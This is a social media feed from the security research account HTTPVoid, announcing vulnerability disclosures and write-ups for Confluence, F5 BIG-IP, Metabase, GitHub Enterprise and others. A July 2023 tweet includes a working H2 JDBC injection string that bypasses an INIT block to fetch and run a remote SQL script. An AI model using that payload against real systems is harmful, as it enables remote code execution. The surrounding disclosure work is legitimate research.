Joined November 2021
HTTPVoid retweeted
🚨 CVE-2026-1731 🚨 Our team discovered a critical pre-auth RCE affecting BeyondTrust Remote Support & Privileged Remote Access. SaaS/Cloud instances have been patched. If you're running self-hosted deployments, apply the patches immediately. More info in the comments.
HTTPVoid retweeted
My research on CVE-2025-49113 is out. fearsoff.org/research/roundc…. Happy reading! #CVE #roundcube #poc @FearsOff
CVE-2025-49113 is a fascinating PHP Object injection in Roundcube webmail, a really nice find by the original finder. #roundcube #cve-2025-49113 #rce
20 Mar 2025
New from us! Testing a Rails Nginx app? This should be in your checklist. Read the blog to know how we disclosed Discourse database backups!
New Blogpost - We identified a vulnerability in Discourse where a misconfiguration in Rails send_file Nginx's internal directive can expose database backups! projectdiscovery.io/blog/dis… This issue isn't limited to Discourse. It can affect other Rails Nginx apps with similar configurations. Read our full analysis and detect it with our Nuclei template, now live on ProjectDiscovery Cloud!
HTTPVoid retweeted
I just published a new blog post sharing an improved Deserialization Gadget Chain for Ruby! It builds on the work of others, including Leonardo Giovanni, Peter Stöckli @GHSecurityLab and @wcbowling nastystereo.com/security/rub…
12 Nov 2024
Check out our latest blog post! We dive into GitHub Enterprise’s SAML implementation and explore an authentication bypass in encrypted assertion mode. CVE-2024-4985 / CVE-2024-9487: GitHub Enterprise SAML Authentication Bypass. projectdiscovery.io/blog/git…
Check out our new blogpost! In this post we talk about SAML and the recent Ruby-SAML Auth bypass. CVE-2024-45409: Ruby-SAML Auth Bypass in GitLab blog.projectdiscovery.io/rub…
HTTPVoid retweeted
9 May 2024
My colleague @hash_kitten and I discovered a full-read SSRF vulnerability in Next.js (CVE-2024-34351). We published our research today on @assetnote's blog: assetnote.io/resources/resea…. Thank you to the Vercel team for a smooth disclosure process.
HTTPVoid retweeted
Check out my write-up on a seemingly harmless and limited send() in GitHub (CVE-2024-0200) and how it could be used to obtain environment variables from a production container and to achieve remote code execution in GitHub Enterprise Server: starlabs.sg/blog/2024/04-sen…

Enjoy our next blog post this time an SQL Injection on Apple’s Infra. Another win nets us a $25,000 bounty! 💻💰 #AppleSecurity #Research #bugbountytips #bugbounty blog.projectdiscovery.io/hac…
Check out our latest research blog, including detailed overview of how we discovered an SQL injection vulnerability (nuclei template) in Masa/Mura CMS and Hacked into Apple's Infrastructure. blog.projectdiscovery.io/hac… #AppleSecurity #Research #CyberSecuirty #BugBounty
15 Feb 2024
Check out our new blog post! We hacked into Apple Travel Portal (yes, again!) using a 0-day Remote Code Execution exploit. Part 1 is live now, stay tuned for the follow-up on another RCE worth a total bounty of $40k! blog.projectdiscovery.io/hel…
22 Jan 2024
As the PoC is almost out, we are now publishing our analysis.
🚀 Just released our in-depth analysis of CVE-2023-22527, a critical RCE vulnerability in Atlassian Confluence Data Center & Server. 🛡️ Don't miss out on our findings and learn how to detect and protect your systems! blog.projectdiscovery.io/atl… #cybersecurity #CVE #RCE #Atlassian #Confluence
18 Jan 2024
Hello OgnlGuard/isSafeExpression, we meet again. Confluence OGNL Injection.
29 Oct 2023
Reproduced the CVE-2023-46747 F5 Big-IP RCE via AJP smuggling. Props to @praetorianlabs for identifying this cool bug. @pdnuclei template dropping soon. Time to sleep😓 #f5-rce #CVE-2023-46747
27 Oct 2023
Reproduced the AJP request Smuggling to access /tmui/* resources directly. Very interesting bug indeed, need to further look into post-exploitation. Until next time😓
F5 BIGIP is vulnerable to a smuggling request vulnerability that an attacker can exploit to achieve unauthorized RCE. Our vulnerability research team responsibly disclosed this to F5, which released a hotfix today. hubs.ly/Q026ThPw0 #vulnerabilityresearch #f5 #cve
HTTPVoid retweeted
HTTP Request Splitting vulnerabilities exploitation offzone.moscow/upload/iblock…

HTTPVoid retweeted
Here is the #exploit that targets the "VMWare Aria Operations for Networks" which has CVSS 9.8 and targets all the versions from 6.0 to 6.10 (CVE-2023-34039) 🔥 I just wrote the exploit, but the discovery credit is for @rootxharsh and @iamnoooob github.com/sinsinology/CVE-2…
28 Jul 2023
Plenty of ways to RCE, another way to bypass the INIT key block for the h2 engine is using an escape character: mem:;\INIT=RUNSCRIPT FROM 'htttp://rce/poc.sql'//\; Great find!
28 Jul 2023
The security research team at @assetnote found and reported a critical pre-auth RCE vulnerability to Metabase earlier this month CVE-2023-38646: blog.assetnote.io/2023/07/22… This one was an incredibly fun discovery as there are many roads to RCE through JDBC. We've published details of the original discovery at our blog:
26 Jul 2023
The Metabase pre-auth RCE is interesting. While the entry point is straightforward, the process of exploitation is fun. We suspect we might have exploited this in an unintended way. We'll wait for @assetnote's blog, based on that we may or may not publish our analysis.
19 Jul 2023
⚠ Multiple RCEs, CVEs, and Confusions. Discover the roller coaster ride of vulnerabilities, patch bypasses, and uncover the story behind the temporary take down of our blog! Read now - nux.gg/adobe-coldfusion-rce-… #AdobeColdFusion #CVE-2023-29300 #CVE-2023-38203 #CVE-2023-38204